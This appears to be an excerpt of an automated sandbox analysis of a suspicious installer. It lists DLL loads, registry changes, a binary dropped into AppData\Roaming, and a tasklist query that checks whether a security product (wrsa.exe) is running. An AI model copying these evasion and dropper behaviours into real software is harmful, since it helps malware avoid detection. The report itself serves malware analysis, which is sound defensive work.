Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: twinui.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe	Section loaded: shdocvw.dll

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #Setup.exe

Static file information: File size 74253304 > 1048576

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2376304733.0000000006F40000.00000004.00000020.00020000.00000000.sdmp
